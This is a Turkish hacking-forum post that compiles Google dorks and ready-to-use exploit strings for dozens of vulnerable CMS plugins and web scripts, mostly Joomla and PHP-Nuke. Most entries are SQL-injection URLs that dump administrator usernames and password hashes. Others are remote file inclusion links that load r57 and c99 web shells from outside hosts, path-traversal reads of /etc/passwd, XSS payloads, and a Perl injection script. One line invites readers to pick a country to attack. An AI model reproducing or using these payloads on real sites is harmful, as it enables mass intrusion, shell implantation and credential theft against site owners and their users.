Turkhackteam.net/org - Turkish Hacking & Security Platform...  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Host, Web Server, Domain, Dns Server Açıkları Hakkında Herşey ...(Dökümanlar Tamamen Eğitim Amaçlıdır.)


Tüm Site Acık Bulma Dorkları

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler Stil
Alt 24-07-2013   #1
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
Jul 2013
Nerden
Hatay Hassa
Yaş
19
Mesajlar
Konular
Ettiği Teşekkür
51
8 Mesajına
8Teşekkür Aldı
  
Post Tüm Site Acık Bulma Dorkları



Tüm Site Acik Bulma Dorkları





PHP-Nuke (Kose_Yazilari) Açığı

Google Arama : ''name Kose_Yazilari op viewarticle artid''
Google arama : ''name Kose_Yazilari op printpage artid''

Site sonuna : modules.php?name=""KoseUS95Yazilari&op=viewarticle &artid=-11223344%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A% 2A%2F0,1,aid,pwd,4,5%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnu keUS95authors

modules.php?name="KoseUS95Yazilari&op=printpage&ar tid=-99999999%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A% 2A%2F0,pwd,aid,3%2F%2A%2A%2Ffrom%2F%2A%2A%2FnukeUS 95authors



WorldTube Açığı

Google Arama: "inurl:/plugins/wordtube"

Site Sonuna : wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://shell/r57.txt?

Not: Html'den sonrasına kendi shell adresiniz gerekli.



Joomla" Component EventList Açığı

Google Arama : intext: Event List 0.8 Alpha by schlu.net

Site Sonuna : //index.php?option=com_eventlist&func=details&did=99 99999999999%20union%20select%200,0,concat(char(117 ,115,101,114,110,97,109,101,58),username,char(32,1 12,97,115,115,119,111,114,100,58),password),4,5,6, 7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*



Powered By 6rbScript Açığı

Google Arama : Powered by 6rbScript

Site Sonuna

PWD

http://www.xxx.com/news.php?newsid=7...m3na_authors--

USER

http://www.xxx.com/news.php?newsid=7...m3na_authors--



Com-Actualite Açığı

Google Arama : allinurl: "com_actualite"

Site sonuna : index.php?option=com_actualite&task=edit&id=-1%20union%20select%201,concat(username,char(32),pa ssword),3,4,5,6,7,8,9%20from%20jos_users/*



Com-Mtree Açığı

Google Arama : inurl:"/com_mtree/"

Site sonuna : http://[target]/[mambo_path]/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=



Webring Component (component_dir) Açığı

Google Arama: inurl:com_webring

Site Sonuna : http://www.site.com/[path]/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://evil_scripts?



Com-Lmo Açığı

Google Arama : "com_lmo"

Site Sonuna : $lmo_dateipfad=$mosConfig_absolute_path."/administrator/components/com_lmo/";
$lmo_url=$mosConfig_live_site."/administrator/components/com_lmo/";



Com-PonyGallery Açığı

Google Arama : inurl:"index.php?option=com_ponygallery"

Site Sonuna : //index.php?option=com_ponygallery&Itemid=x&func=vie wcategory&catid=%20union%20select%201,2,3,concat(c har(117,115,101,114,110,97,109,101,58),username,ch ar(32,112,97,115,115,119,111,114,100,58),password) ,5,0,0%20from%20jos_users/*



Com-NeoRecruit Açığı

Google Arama : inurl:index.php?option=com_NeoRecruit

Site Sonuna : //index.php?option=com_neorecruit&task=offer_view&id =99999999999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),3,4,5,6 ,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4 ,5,0%20from%20jos_users/*



Com-Rsfiles Açığı

Google Arama : inurl:"/index.php?option=com_rsfiles"

Site sonuna : //index.php?option=com_rsfiles&task=files.display&pa th=..|index.php
//index.php?option=com_rsfiles&task=files.display&pa th=



Com-Nicetalk Açığı

Google Arama : inurl:index.php?option=com_nicetalk

Site sonuna : //index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*



Com-Joomlaradiov5

Google Arama : inurl:"com_joomlaradiov5"

Site Sonuna : http://www.site.com/administrator/co.../c99haxor.txt?



Com-JoomlaFlashFun Açığı

Google Arama : "com_joomlaflashfun"

Site Sonuna : xxx.net: The Leading XXX Site on the Net[attacker]



Carousel Flash Image Açığı

Google Arama : inurl:"com_jjgallery

Site Sonuna : http://[Taget]/[Path]/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://sibersavascilar.com/shelz/r57.txt ?



Com-Mambads Açığı

Google Arama : inurl:com_mambads

Site Sonuna :
index.php?option=com_mambads&Itemid=0&func=detail& cacat=1&casb=1&caid=999/**/Union/**/select/**/1,2,3,4,5,concat(char(117,115,101,114,110,97,109,1 01,58),username,char(32,112,97,115,115,119,111,114 ,100,58),password),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23%20from%20mos_users/*


----------------------------------------------------------------------------------------------------------------


WebLosning Açığı

Dork : allinurl: "index2.php?id"

Exploide

1 http://www.target.dk/index2.php?id=-...brugernavn,adg angskode),4,5,6+from+web1_brugere/*

2 http://www.target.dk/index2.php?id=2...ugernavn,adgan gskode),3+from+web2_brugere/*

3 http://www.target.dk/index2.php?id=-...ugernavn,adgan gskode),3,4,5,6+from+web3_brugere/*

4 http://www.target.dk/index2.php?id=-...ugernavn,adgan gskode),3,4,5,6+from+web4_brugere/*




Powered By: MFH v1 Açığı

Dork: "Powered by: MFH v1"

Exploitation options:

ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pas s,5,6,7,8+from+users+-- to get the users

ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+set ting+-- to get the admin info

ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+serv er+-- to get the ftp server info (if its configured)




W.G.C.C Açığı

Google Dork : "Web Group Communication Center"

Exploit:
XSS:
http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72% 61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61 %2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%7 4%6C%65%74%2E%68%74%6D%6C%3C




Powered By Zomplog Açığı

Dork: "powered by zomplog"

Exploit:
http://localhost/path/upload/force_d...e_download.php




Xcart Rfi Açığı

Google dork : "X-CART. Powerful PHP shopping cart software"

Exploit

site.com/[xcart-path]/config.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/prepare.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/smarty.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/customer/product.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/provider/auth.php?xcart_dir=http://shell.txt?
site.com/[xcart-path]/admin/auth.php?xcart_dir=http://shell.txt?




Plugin-Class tabanlı Sistemlerde Açık

Google Dork: index.php?loc= veya allinurl:.br/index.php?loc=

Exploide:

administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= inurl:"us/index.php?option=com_comprofiler"

Note: 2. dorkda .br/ yazan yerin yerine saldırmak istediğiniz ülkenin uzantısını yazabilirsiniz...




Powered By Linkspile Açığı

Dork : Powered By linkspile

Exploit :

Example Domain x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,1 8/**/from/**/lp_user_tb/*



The Realestate ****** Açığı

Dork : inurl:dpage.php?docID

Exploit : Example Domain ord)+from+admin




Calogic Calendars V1.2.2 Açığı

Dork : "CaLogic Calendars V1.2.2"

POC : http://localhost/[******_PATH]/userreg.php?langsel={SQL}

Example : http://localhost/[******_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--




Powered By PHPizabi Açığı

Dork: "Powered by PHPizabi v0.848b C1 HFP1"

Exploit:

http://localhost/izabi/system/cache/...s/id_shell.php

Example:

http://localhost/izabi/system/image.....php&width=500




AJ Auction 6.2.1 Açığı

DORK: inurl:"classifide_ad.php"

Exploide:

http://site.com/classifide_ad.php?it...assword),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*




Powered By Novus Açığı

Dork: "Powered by Novus"

İnformation server:

http://[novus]/notas.asp?nota_id=1+a...t(int,db_name())
http://[novus]/notas.asp?nota_id=1+a...nt,system_user)
http://[novus]/notas.asp?nota_id=1+a...@servername)--
http://[novus]/notas.asp?nota_id=1+a...t,@@version)--




Com-Mgm Açığı

Google Dork: inurl:"com_mgm"

Exploide:

administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Loudmounth Açığı

Dork: inurl:com_loudmounth

Exploid:
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Com-Thopper Açığı

Google Dork : inurl:com_thopper veya inurlhp?option=com_thopper

Exploid:
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=htt p://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?




Com-Bsq-Sitestats Açığı

Google Dork: inurl:com_bsq_sitestats

Exploid:
/components/com_bsq_sitestats/external/rssfeed.php?baseDir=http://megaturks.by.ru/c99.txt?




Com-PeopleBook Açığı

Google Dork: inurl:com_peoplebook

Exploid:
/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?




Joomla Component AstatsPRO Açığı

Dork: allinurl: "com_astatspro"

Exploide: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*




WorkingOnWeb 2.0.1400 Açığı

Dork: Powered by WorkingOnWeb 2.0.1400

Exploide:

http://localhost/events.php?idevent=...ll,0,0,0,0,0,0, 0/**/from/**/mysql.user/*




Powered by cpDynaLinks Açığı

Dork: Powered by cpDynaLinks

connecting in http://127.0.0.1/...
[!] user: admin [!] pass: c9cb9115e90580e14a0407ed1fcf8039

use strict;
use LWP::UserAgent;

my $host = $ARGV[0];

if(!$ARGV[0]) {
print "\n
cpDynaLinks 1.02 Remote Sql Inyection exploit\n";
print "
written by ka0x - ka0x01[at]gmail.com\n";
print "
usage: perl $0 [host]\n";
print "
example: http://host.com/cpDynaLinks\n";
exit(1);
}

print "\n
connecting in $host...\n";
my $cnx = LWP::UserAgent->new() or die;
my $go=$cnx->get($host."/category.php?category=-1'/**/union/**/select/**/1,2,3,concat(0x5f5f5f5f,0x5b215d20757365723a20,adm in_username,0x20205b215d20706173733a20,admin_passw ord,0x5f5f5f5f),5,6,7,8,9,9,9,9/**/from/**/mnl_admin/*");
if ($go->content =~ m/____(.*?)____/ms) {
print "$1\n";
} else {
print "\n[-] exploit failed\n";
}
Gelen sayfada "kaynağı görüntüle"yiniz. İlk satırlarda admin nick vs md5 ler yer alır




Maplab-2.2 Açığı

Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]




Maplab-2.2 Açığı

Dorks:

index.of /maplab-2.2
intitle:MapLab
index.of /maplab-2.2
index.of /maplab/

Exploit:
http://site.com/pathmaplab/htdocs/gm...hp?gszAppPath=[EvilScript]




Admidio 1.4.8 RFI Açığı

Dork : "Admidio Team"
POC : /adm_program/modules/download/get_file.php?folder=&file=../../../../../../../../../../etc/passwd&default_folder=
Example : http://demo.admidio.org/adm_program/...efault_folder=




ezContents CMS Açığı

Dork: "ezContents CMS Version 2.0.0"

Exploits:

http://site.com/[patch]/showdetails.php?contentname="'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*

Exploits 2:

http://site.com/[patch]/printer.php?article='/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,concat(login,0x3a,userpas sword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*




SoftbizScripts Açığı

Dork: "inurl:Powered by SoftbizScripts" veya "Subscribe Newsletter"

Exploit: http://www.ssss.com/hostdirectory/se...php?host_id=-1 union select 1,2,concat(sb_id,0x3a,sb_admin_name,0x3a,sb_pwd),4 ,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 ,0,1,2,3,4,5,6,7,8,9 from sb_host_admin--

****** Açığıdır...




ProfileCMS v1.0 Açığı

Dork: "Powered By ProfileCMS v1.0" veya "Total Generators & Widgets"

Exploit: http://target.com/index.php?app=prof...x3a,username,0 x3a,password,0x3a,email),4,5,6,7,8,9,10%20from%20u sers/*

target.org a,password,0x3a,email),3,4,5,6%20from%20users/*

Target.net a,password,0x3a,email),3,4,5,6%20from%20users/*

Target.net 3737764),3,4,5,6%20from%20users/*




Com-Rsgallery Açığı

Dork: : "option=com_rsgallery" veya inurl:index.php?option=com_rsgallery

Exploit: /index.php?option=com_rsgallery&page=inline&catid=-1%20union%20select%201,2,3,4,concat(username,0x3a, password),6,7,8,9,10,11%20from%20mos_users--

Admin nick vs hashları verir. Joomlada bulunan bir açıktır

Admin girişi: /administrator/




Powered By Power Editor Açığı

Dork: Powered By Power Editor

Exploid : http://site.com/editor.php?action=tempedit&m=[base64 password]&te=[local_file]&dir=[local_dir] examp: editor.php?action=tempedit&m=Y2hhbmdlbWU=&te=/etc/passwd&dir=../../../../../../../../../..




Kmitam Açığı

Dork: "inurl:/kmitam/"

Poc/Exploit: kmitaadmin/kmitam/htmlcode.php?file=http://attacker.com/evil?

Yöntemi: Shell




BackLinkSpider Açığı

Dork: "Powered By BackLinkSpider" veya "inurl:backlinkspider.php"

Exploit: http://www.site.com/[backlinkspider_page_name].php?cat_id=[SQL]

http://www.site.com/[backlinkspider_page_name].php?cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,0,1,version (),3,4,5,6,7,8,9,0/*


----------------------------------------------------------------------------------------------------------------



Kmita Tell Friend Açığı

Dork: "Powered by Kmita Tell Friend" veya "allinurl:/kmitat/"

Exploit: /kmitaadmin/kmitat/htmlcode.php?file=http://attacker.com/evil?

Yöntemi: Shell
Panele yönlendirir.




View-FAQ Açığı

Dork: Google : "allinurl:viewfaqs.php?cat="

Exploide:
/viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a, password)%20from PHPAUCTIONXL_adminusers--




Days-Booking Açığı

Dork: "allinurl:index.php?user=daysbooking"

Exploid: index.php?pid=-1%20union%20select%201,concat(id,0x3a,user,0x3a,pa ssword,0x3a,access,0x3a,email),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7 ,8,9,0,1,2%20from%20admin--&user=det




Pn-Encyclopedia Açığı

Dork: allinurl:index.php?module=pnEncyclopedia

Exploide (1-2)
1- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,version(),8,9,10,11--
2- index.php?module=pnEncyclopedia&func=display_term& id=9999 union select 1,2,3,4,5,6,load_file




Gamma Scripts Açığı

Dork : "BlogMe PHP created by Gamma Scripts"

Exploit : http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0 x71)--

veya

http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,unhex(hex(database())),4,5,6,7--




ASPapp KnowledgeBase Açığı

Dork 1 - content_by_cat.asp?contentid ''catid''

Dork 2 - content_by_cat.asp? ''catid''

exploit-

content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accessleve l,5,null,7,null,user_name+from+users

content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accessleve l,5,null,7,8,user_name+from+users




EmagiC CMS.Net v4.0 Açığı

Dork : inurl:emc.asp?pageid=

Exploit:

emc.asp?pageId=1' UNION SELECT TOP 1 convert(int, password%2b'%20x') FROM EMAGIC_LOGINS where username="'sa'--




vlBook 1.21 ****** Açığı

****** Download : http://home.vlab.info/vlbook_1.21.zip

DORK : "Powered by vlBook 1.21"

XSS Address : http://example/?l=" <******>alert('xss')</******>

LFI Address : http://example/include/global.inc.php?l=../../../[FILE NAME]%00




PHP-Nuke Siir Açığı

DORK 1 : allinurl:"modules.php?name"print

DORK 2 : allinurl:"modules.php?name="Hikaye"
DORK 3: allinurl:"modules.php?name="Fikralar"
DORK 4: allinurl:"modules.php?name="bilgi"

EXPLOIT :

print&id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,aid,0x3a,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202




Com_JoomlaFlashfun Açığı

Dork: "com_joomlaflashfun"

Example:
xxx.net: The Leading XXX Site on the Net[xxxx]




Powered By The Black Lily 2007 Açığı

Dork : "Powered By The Black Lily 2007"

EXPLOIT:
http://victim.com/ar/products.php?cl...username%20fro m%20admin/*

veya

http://victim.com/en/products.php?cl...username%20fro m%20admin/*




JUser Joomla Component 1.0.14 Açığı

Dork: inurl:com_juser

Exploit

http://localhost/path/administrator/...absolute_path=[evilcode]




Rmsoft GS 2.0 Açığı

Dork: intext:Powered by RMSOFT GS 2.0 veya inurl:modules/rmgs/images.php

Exploit:

modules/rmgs/images.php?q=user&id=1999/**/union/**/all/**/select/**/1,1,concat(database(),0x202D20,user()),1,1,1,1,0,1 ,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,1,1,1,0,1,0,0/*




Com-Na-Xxx Açığı

DORK 1 : allinurl:"com_na_content"

DORK 2 : allinurl:"com_na_bible"

DORK 3 : allinurl:"com_na_events"

DORK 4 : allinurl:"com_na_content"

DORK 5 : allinurl:"com_na_feedback"

DORK 6 : allinurl:"com_na_mydocs"

DORK 7 : allinurl:"com_na_churchmap"

DORK 8 : allinurl:"com_na_bibleinfo"

DORK 9 : allinurl:"com_na_dbs"

DORK 10 : allinurl:"com_na_udm"

DORK 11 : allinurl:"com_na_qforms"

DORK 12 : allinurl:"com_na_gallery2"

DORK 13 : allinurl:"com_na_publicrss"

DORK 14 : allinurl:"index.php?kwd"

EXPLOİT:

index.php?option=com_sermon&gid=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0,0,username,passwo rd%2C0%2C0%2C0/**/from/**/mos_users/*




Com-Comments Açığı

Dork: "Review ******", "Phil Taylor"

Exploit:
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1




Portfolio Manager 1.0 Açığı

Dork: inurl:"index.php?option=com_portfolio"

Exploit:

http://site.com/index.php?option=com...rId=9&category Id=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*




Com-Astatspro Açığı

Dork: allinurl: "com_astatspro"

PoC: administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/0,concat(username,0x3a,password,0x3a,usertype),con cat(username,0x3a,password,0x3a,usertype)/**/from/**/jos_users/*

Gelen sayfada sağ tıkla kaynağı görüntüle.

<H1>302 Moved</H1>
The ******** has moved <A HREF="admin:c9cb9115e90580e14a0407ed1fcf8039:Super Administrator">here</A>.

Bu bölümde md5 saklıdır.




Modified By Fully Açığı

DORK : allinurl :kb.php?mode=article&k
DORK : "Powered by phpBB © 2001, 2006 phpBB Group" veya "Modified by Fully Modded phpBB © 2002, 2006"

EXPLOIT :

kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),usernam e,char(58),user_password),4,5,6,7,8,9,10,11,12,13+ from+phpbb_users+where+user_id+=2&page_num=2&cat=1




Easy-Clanpage v2.2 Açığı

Dork: "Easy-Clanpage v2.2"

Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/*




BM Classifieds Açığı

Dork 1 : ''showad.php?listingid=''

Dork 2 : ''pfriendly.php?ad=''

EXPLOIT:

showad.php?listingid=xCoRpiTx&cat=-99/**/union+select/**/concat(username,0x3a,email),password,2/**/from/**/users/*

pfriendly.php?ad=-99%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0 ,1,concat(username,0x3a,email),password,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27%2F%2A%2A%2Ffrom%2F%2A%2A%2Fusers%2F%2A%2A%2F




Porar WebBoart Açığı

DorK : '' webboard question.asp QID''

EXPLOIT:
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2 ,username,password,5,password,7,8,9,null%20+%20fro m%20+%20+%20administrator%20';';




Com-Noticias Açığı

DorK : ''com_noticias''

EXPLOIT: index.php?option=com_noticias&Itemid=xcorpitx&task =detalhe&id=-99887766/**/union/**/%20select/**/0,concat##(username,0x3a,password,0x3a,email),2,3, 4,5/**/%20from/**/%20jos_users/*




ASPapp -links.asp Açığı

dork - ''links.asp?CatId''

links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users

admin login-
http://www.xxx.com/path/login.asp?re...Fadmin%2Easp%3 F




Modules-Viso Açığı

DORKS 1 : allinurl :"modules/viso"

EXPLOIT 1 :

modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201

EXPLOIT 2 :

modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201




Bookmarkx ****** Açığı

DorK 1 : "2007 BookmarkX ******"

DORK 2 : Powered by GengoliaWebStudio

DORK 3 : allinurl :"index.php?menu=showtopic"

EXPLOIT :

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

veya;

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1




Com-Profiler Açığı

DORK: allinurl:com_comprofiler

Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*




Com-Jpad Açığı

DORK: allinurl:com_jpad

Example: /index.php?option=com_jpad&task=edit&Itemid=39&cid=-1 UNION ALL SELECT 1,2,3,concat_ws(0x3a,username,password),5,6,7,8 from jos_users--




PostSchedule Açığı

Google Dork : "PostSchedule ver 1"

Exploid:

index.php?module=PostSchedule&view=event&eid=-1')+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*




joomla SQL Injection(Com-Jokes) Açığı

DorK : allinurl: "com_jokes"

EXPLOIT :

index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*




Com_Estateagent Açığı

Dork : allinurl: "com_estateagent"

EXPLOIT :

index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=xxxx




Com-Fq Açığı

DorK: allinurl: "com_fq"

EXPLOIT :

index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*




Com-Mamml Açığı

DorK : allinurl: "com_mamml"

EXPLOIT :

index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*




joomla SQL Injection(com_gallery) Açığı

DORK : allinurl: com_gallery "func"

EXPLOIT 1 :

index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*

EXPLOİT 2 :

index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users




Joomla Component Profiler Açığı

DORK: allinurl:com_comprofiler

Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*




Joomla Component Filiale SQL Injection Açığı

DORK : inurl:com_filiale

Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users




FlippingBook Açığı

DORK : inurl:com_flippingbook

Exploit :

/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*




Pagenum Açığı

DORK : allinurl: " list.php?pagenum"

EXPLOIT

list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*




Modules-Tutorials Açığı

DORK 1 : allinurl :"/modules/tutorials/"

DORK 2 : allinurl :"/modules/tutorials/"tid

EXPLOIT 1 :

modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*

EXPLOIT 2 :

modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*




Modules-Glossaires Açığı

DORK : allinurl: "modules/glossaires"

EXPLOIT :

modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme




OsCommerce SQL Injection Açığı

Google Dork: inurl:"customer_testimonials.php"

Exploit:
http://site.com/customer_testimonial...l_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*

Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.




Tr ****** News v2.1 Açığı

Google Dork: inurl:news.php?mode=voir

Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*

Admin girişi = /admin



----------------------------------------------------------------------------------------------------------------




Com-Alberghi Açığı

DORK 1 : allinurl: "" detail

DORK 2 : allinurl: "com_alberghi"

EXPLOIT 1 :

index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*

EXPLOIT 2 :

index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*




Powered By Joovideo V1.0 Açığı

DORK 1 : allinurl: "com_joovideo" detail

DORK 2 : allinurl: "com_joovideo"

DORK 3 : Powered by joovideo V1.0

EXPLOIT :

index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*




AllMy-Guests ****** Açığı

Açığı bulunan ******: AllMyGuests
Google Dork: "powered by AllMyGuests" (Tırnaklar yok)

